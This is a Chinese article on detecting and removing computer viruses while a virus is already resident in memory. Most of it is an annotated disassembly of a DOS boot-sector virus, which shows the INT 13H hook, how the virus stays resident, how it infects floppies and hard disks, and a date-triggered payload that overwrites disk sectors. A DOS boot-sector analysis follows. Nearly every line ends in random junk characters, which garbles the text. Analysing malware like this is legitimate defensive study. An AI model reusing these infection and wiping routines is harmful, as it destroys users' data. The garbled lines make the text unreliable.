近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 E*:!G
?? `{gkL-
?? 一 、 带毒环境下检测清除病毒的意义 1y2D]h /'
?? IgI*mDS&b
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 JN .\{ Y
?? 2%m H
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 m$ )yd~
?? eB%KXPhMm
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 me_DONW
?? w9rwuk
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 mSp-
?? Kyt.[" p
?? 二 、带毒环境下检测清除病毒的原理 yM}}mypS
?? jrbEJ.
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 2?u>A3^R
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 `MAee8u'
=Mzg={)v
y>Zvos e
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " I?YTX
病毒体: MUhC6s\F
JMP 01AF ;JMP到01AF )@09Y_9r
DB 00 ;病毒标计 D>+&= 5{
DW 00F5 ;此为搬到高位址后,远程跳转指令 p(QB 5at
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX ZM K"3c9
DB 02 W$B&asO
DW 0003 ;此为软盘识别标记,硬盘为0007 K{.s{;#
DW EC59 ; }__g\?Yf
DW F000 ;INT 13H的原入口 'YIFHn$!
. *%l&'+
. x%23oPM
. *:J#[ET,
. =2] .G Gg
. ,],"tzKtE
XOR AX,AX ;清除AX M>D 3NY[,
MOV DS,AX; ;让DS=0000 7?-eR-
CLI ;清I标志积存器 JZQkr
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 t
j&+HC
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 :@jhe8'w
MOV SP,AX ;开机时为0000:7CB6 SweaERl
STI ;设I标志积存器 LTj;e[
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A fu?5gzT+b
PUSH AX ;用RETF,把程序转到引导或分区表位置 nF~</>
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 ,Xs%Cg_Ig
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 !%5ae82~3
MOV AX,[004E] ;取INT 13H的段地址 X&o!xV -+
MOV [7C0C],AX ;存到010C [t*m$0[:
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 \kqa4{7 U(
;读写以便传播发作 3G9"La,b
|7,|-s[R^
MOV AX,[0413] ;取得内存K数,放在AX no- Lx-x
DEC AX ; ,mEFp_a+
DEC AX ;减2k内存 cTu7U=%
MOV [0413],AX ;存回,通常是638K xT70Rp(2po
MOV CL,06 ; k$UgTZ
SHL AX,CL ; !4GGq
MOV ES,AX ;算出减2K后病毒本体的位址 Pk9s~}X
MOV [7C05],AX ;AX存入0105 }hrLM[
s\i=-`
;病毒常用手法将系统高段内存减少以便驻留 G;_QE<V~_
;这样可以免于被其他程序覆盖 iwWy]V m7
|-4C[5rM
MOV AX,000E ;病毒拦INT 13H `,i'vb`W#b
;ISR起始的偏移量 gvvl3`S{
MOV [004C],AX ; zvf:*Na")
MOV [004E],ES ;设原为病毒的INT 13H ;F9<Yv
MOV CX,01BE ;病毒长度为1BE b}S}OW2
MOV SI,7C00 ;从JMP 01AF开始 &f'\9lO
XOR DI,DI ;DI=0 O( G|fs
CLD ;清方向标志 V#.;OtF]
REPZ; 'c<vj
jIg
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 /%C6e
)7BL
CS: ;分区表能载入0000:7C00正常运作 _+g5;S5
JMP FAR [7C03] ;跳到为搬过后的位址 "'h?O*V]u{
XOR AX,AX ;清AX $gT+Ue|7
MOV ES,AX ;ES=0000 jXvGL
INT 13 ;复位磁盘 3p{N7/z(
PUSH CS ; )k01K,%#)
POP DS ;让DS=CS pA%XqG*=Y
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 <9 lZ%j;
MOV BX,7C00 ;读到0000:7C00 drP2%u
MOV CX,[0008] ;硬盘第0道,第7扇区 Yr5A,-s
CMP CX,+07 ;比较是否从硬盘启动 +]uW|owxo
JNZ 0213 ;不是跳0213 x- kCNy
MOV DX,0080 ;第一硬盘C:第零面 x7K
INT 13 ;用INT 13号中断,读 cE>K:3n
JMP 023E ;跳023E比较日期,发作或正常开机 ^
AxU
MOV CX,[0008] ;软盘0道,第3扇区 ]vJZ v"ACn
MOV DX,0100 ;A:的第0面 O&l(`*P
INT 13 ;INT 13读盘 *')BP;|V`
JB 023E ;失败跳023E 5QB]2c^
PUSH CS vzJ69%E_
POPES ;让ES=CS .w/#S-at
MOV AX,0201 ; .Gq.s t%
MOV BX,0200 ; Os^ sOOSY
MOV CX,0001 ; Cbm
MOV DX,0080 ; 9)0AwLlv
INT 13 ;读入C:的分区表到0200,以便下面比较 : Q X~bq
JB 023E ;失败跳023E `fh^[Q|4n0
XOR SI,SI ;清SI -QjdL9\[c7
CLD ;清方向标志以便比较 J_YbeZ]
LODSW ;载入一个WORD到AX 3{RuR+yi
CMP AX,[BX] ;比较有无病毒存在..E9AC J~KWn.
JNZ 0287 ;没有则跳0287传染 x3=W{Fv@4
LODSW ;载入一个WORD到AX GdG1e%y]z
CMP AX,[BX+02] ;再次确认..0000 $fhrGe
JNZ 0287 ;没有跳0287 yi<&'L;
XOR CX,CX ;清CX r \H+=2E'
MOV AH,04 ; Uo v%12
INT 1A ;取得日期 Be}e%Rk
CMP DX,0306 ;是否为三月六日 v ~.X
JZ 024B ;是跳024B传染 .+>w0FG.
RETF ;把程序交还给引导启动完成 :,"dno7OQ
~ ui/Qf2|
步骤4:病毒INT 13代码分析 Mf7Q+_!
方法:U u8qL?Aj^
PUSH DS ;首先把要用到积存器 R 5 47
PUSH AX ;入栈保存 r9z_8#cR
OR DL,DL ;比较是否为软盘 ,\!4A
JNZ 002F ;如不是则退出传染 5,`U3na,
XOR AX,AX ;AX=0 \eF5* {9
MOV DS,AX ;数据代段=0 UgDai?b1
TEST BYTE PTR [043F],01 ;比较是否为A盘 ! utgo/n
JNZ 002F ;不是则退出 `M/=_O3
POP AX ;将以上保存积存器 g0Qg]F5D~
POP DS ;弹栈恢复 { 6Lkh
PUSHF ;压栈标志积存器 L>+g;GJ
CS: ;以便执行原INT 13 ^;+lsEW
CALL FAR [000A] ;执行原INT 13 4NN-'Z>a
PUSHF ;再次压栈 %HSS
x+2oR
CALL 0036 ;以便跳转到传染程序 DR3M|4[
POPF ;跳转到执行传染 /*p4(D_A
RETF 0002 ;结束中断调用返回 `q* 0^}
POP AX ;恢复 {:m5<6?x)
POP DS ;堆栈 q# gZ\V$I
CS: ;跳转到原正常INT 13 2+"=i/8
JMP FAR [000A] ;地址执行 nP?=uGqCBq
_?<Y>B, E
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 !VpZo*+
cd{3JGgB
步骤5:传染过程分析 ^% BD
方法:U lz\{ X
对软盘传染过程: 5&7)hMppI
PUSH AX ;工 SdC505m0*
PUSH BX ;作 ?2[=llS4
PUSH CX ;寄 mXlXB#N
PUSH DX ;存 Y<3s_
PUSH DS ;器 1~8F&
PUSH ES ;入 _/ j44q
PUSH SI ;栈 n>>hfxv(O!
PUSH DI ;保存 -aG( Yx
PUSH CS ;以压/弹栈方式 hor ok:{
POP DS ;使数据段DS和 hJ4==ILx
PUSH CS ;附加段ES均指向 PN/2EmwtC
POP ES ;代码段CS Uo(\1&?
MOV SI,0004 ;试4次 i_g="^
MOV AX,0201 ;设置各 a1ZGMQq!
MOV BX,0200 ;积存器 LW_Y
MOV CX,0001 ;为读软盘 mmY~V:,Kd
XOR DX,DX ;引导扇区做准备 X^% I 3
PUSHF ;压栈标志积存器 #@BM1BpQ
CALL FAR [000A] ;正常的INT 13调用 n-,~Bp
[
JNB 0063 ;成功则转判断 G,{L=xOh
XOR AX,AX ;不成功复位 Gcg`Knr
PUSHF ;磁盘继续读 }@@1N3nnxV
CALL FAR [000A] ;如果4次 QC~B8 ]
DEC SI ;均匀不成功 Wr`=P,
JNZ 0045 ;则退出跳转 ':[+UUC@
JMP 00A6 ;退出传染 d(,-13
XOR SI,SI ;SI=0以便用 ( NjX?^
CLD ;LODSW读入软盘 $>/J8iB
LODSW ;第1或第2字进行比较 mfG|K@ODM-
CMP AX,[BX] ;比较如果不包含病毒标志 {eIE|
JNZ 0071 ;则跳转写传染 U,iTURd
LODSW ;如果已有标志 4}580mBc
CMP AX,[BX+02] ;则退出 tl ;?/
JZ 00A6 ;传染子程序 ~SM2W%
MOV AX,0301 ;为写盘准备 Z>QSZ48=
MOV DH,01 ;如果是360K "4g1I<
MOV CL,03 ;则写到1面0道3扇区 -#<,i'
CMP BYTE PTR [BX+15],FD ;比较软盘 ]*i>KR@G
JZ 0080 ;如果大于360K i=o>Bl@f
MOV CL,0E ;写到1面0道14扇区 ct~lt'L\
MOV [0008],CX ;写病毒标志到软盘 xO1d^{~^^
PUSHF ;调用原INT 13 >z^T~@m7l
CALL FAR [000A] ;进行传染 7azxqa5:
JB 00A6 MLBZmM '
MOV SI,03BE ;以下是将正常 +Ya-h~7;g#
MOV DI,01BE ;引导扇区从 Q2rZMK
MOV CX,0021 ;1BE起的21字节内容 d/t'N-m
CLD ;搬移到病毒程序尾部 `R:<(:
REPZ ;开始复制 _rs#h)
MOVSW ! \awT
MOV AX,0301 ;写盘功能调用,写一个扇区 B|, 6m 3.
XOR BX,BX ;将病毒程序 6h+/C]4
MOV CX,0001 ;写入软盘引导扇区内 <V6#)^Or
XOR DX,DX ;设置为软盘 J8b]*2D
PUSHF tD4IwX
CALL FAR [000A] ;执行正常INT 13调用写盘 |0qk
POP DI ;将 W_sDF; JP
POP SI ;工 Z@I%ppd
POP ES ;作 3ZZJYf=
POP DS ;寄 uxh4nyE
POP DX ;存 ZgXh[UHQy
POP CX ;器 B;K{Vo:C
POP BX ;退 e#zGLxa
POP AX ;栈 Fa/i./V2
RET ;返回调用处 ZVGw@3
对硬盘传染过程: 3_ zI$Z
MOV CX,0007 ;第7扇区 pp{);
MOV [0008],CX ;此处为硬盘引导标记 1:>RQPXcWv
MOV AX,301 ;写功能调用 -y/?w*Cx
MOV DX,0080 ;设置为硬盘 4a3f!G$
INT 13 ;将正常引导扇区写到0面0道7扇区内 Q|v=W C6
JB 13E ;失败则转 RK'( {1
MOV SI,03BE ;原分区表地址 Me`"@{r|#
MOV DI,01BE ;目标地址 r?[mn^Bo 5
MOV CX,0021 ;整个分区表 N{q'wep
REPNZ F2:7UNy,
MOVSW ;开始复制 !^m5by
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 d&ZwVF!
;这样在分析着查看硬盘分区信息时仍能看到该部分 2i>xJMW
;内容,以次来麻痹分析者 #Se
MOV AX,0301 ;准备写病毒提进硬盘 -B4v1{An
XOR BX,BX ;病毒体位置 9
/zz@
INC CL ;第一扇区 +2?0]6EQ
INT 13 ;开始写盘传染 Y3Qq'FN!I
JMP 013E ;转到13E处判断是否为3月6日,是则发作 1L9^N
wR4P0[
步骤6:破坏过程分析 HOUyB's'
方法:U &U,f~KJ
主要分析对硬盘数据破坏: 6?a(@<k_
. L;`4"
. VAthQ<
. O.4"h4{'
. DRzpV6s
. g9
yCd(2<5
MOV DL,80 b\+|g9Tm
MOV BYTE PTR[0007],04 (
ou:"Y
;准备写硬盘 5m bs0GL
MOV AL,11 ;写17个扇区 G|MDo|q]
MOV BX,5000 >3kR~:;
MOV ES,BX ;从内存ES:5000中处开始写 :^*V[77
INT 13 ;残不人睹 /Z% ?;
JNB 0179 ;成功转179继续写 ~d%Q1F*,=
XOR AH,AH *.+>ur?t
INT 13 ;不成功复位磁盘继续 p/5!a~1'xN
INC DH ;使写操作磁头加1继续? WR-C_1-pT
CMP DH,[0007] ;比较是否小于0007单元值 yd%\3}-
JB 0150 ;是则返回开始处继续写 M!hby31
XOR DH,DH ;DH=0 XVLuhwi
INC CH ;再加扇区 0iE).Za0g
JMP 0150 ;反回继续写 f|G7L5-
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 ?dmMGm0T9
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 N4v)0
;和文件分配表。 &B2c]GoW
T7T!v
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 v-gT
3kJ
读盘的时将自身写入磁盘。 pd;-z
引导过程如下: e>>G4g
1>调整堆栈位置 qN0#=X
2>修改并用修改后的磁盘参数表来复位磁盘系统 c6uKKh>
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 Y) h%<J
4>读入根目录表的首扇区 ?|8Tgs@+
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS :fYwFD( 9
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 _%2Umy|
7>跳到0000:0700H处执行IO.SYS,引导完毕 KVcZ@0[S
003E FA CLI `p{!5
003F 33C0 XOR AX,AX Y z,!#ob$
0041 8ED0 MOV SS,AX ?|7+cz$g
0041 8ED0 MOV SS,AX } >w
0043 BC007C MOV SP,7C00 ; 初始化堆栈 XH *tChf<
0046 16 PUSH SS cGc|n3(
0047 07 POP ES ;(ES)=0000H Q kZM(pG
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H >h[!gXL^
004B 36 SS: ;(SS)=0000H xI:
'Hk1
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI -n
*>zGc
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 q-G|@6O
004F 56 PUSH SI ;取到后压入堆栈中保存 Qkib;\2
0050 16 PUSH SS oyt//SE
0051 53 PUSH BX ;保存地址0000:0078H $
tNhwF
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 Inc:t_
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节 W#L"5pRg
0058 FC CLD cXY'>N
0059 F3 REPZ _0*>I1F~
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处 o1WidJ"
005B 06 PUSH ES kxW>Da<6
005C 1F POP DS ;(DS)=0000H p}A4K#G
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间" i5KwYoN
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数" DjzUH{6O
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数" '
f$L
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址) ~Ex.Yp8.
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号 3> #mO}\
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表 b_jZL'en
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘 -+rF]|Wi
0072 7279 JB 00ED ;出错则转出错处理 x"8ey|@&,
K` ,d$
; 下面一段程序计算扇区位置 UY-IHz;&O-
0074 33C0 XOR AX,AX m6r )Z5}f
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数 H@MFj>~
007A 7408 JZ 0084 ;为零表示大硬盘? ;(Xe@OtW
007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处 T_x+sv=|X!
0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的
NVJ&C]H6
0084 A0107C MOV AL,[7C10] ;取FAT表的个数 =*g$#l4
0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数 |R;l5ZKvV
008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位) em1cc,
008F 13161E7C ADC DX,[7C1E] ; 高位 F[CT l3X
0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位) -#wVtXaSc
0097 83D200 ADC DX,+00 ; (高位) oKYhE
009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位) ^+as\
009D 8916527C MOV [7C52],DX ; (高位) :@ E1Pun?
00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位) Dk`4bYK
00A4 89164B7C MOV [7C4B],DX ; (高位) (.,'}+1
00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节 ZS XRzH~0
00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数 z,bX.*.-
00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数" 9Yl8ndP^E
00B3 03C3 ADD AX,BX ;这两条指令是为了取整 0TO_1 0D
00B5 48 DEC AX )[^y
t0%
00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数 2{e dW+
00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位) VyWYfPK
00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位) 1BMB?I
;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS -R&E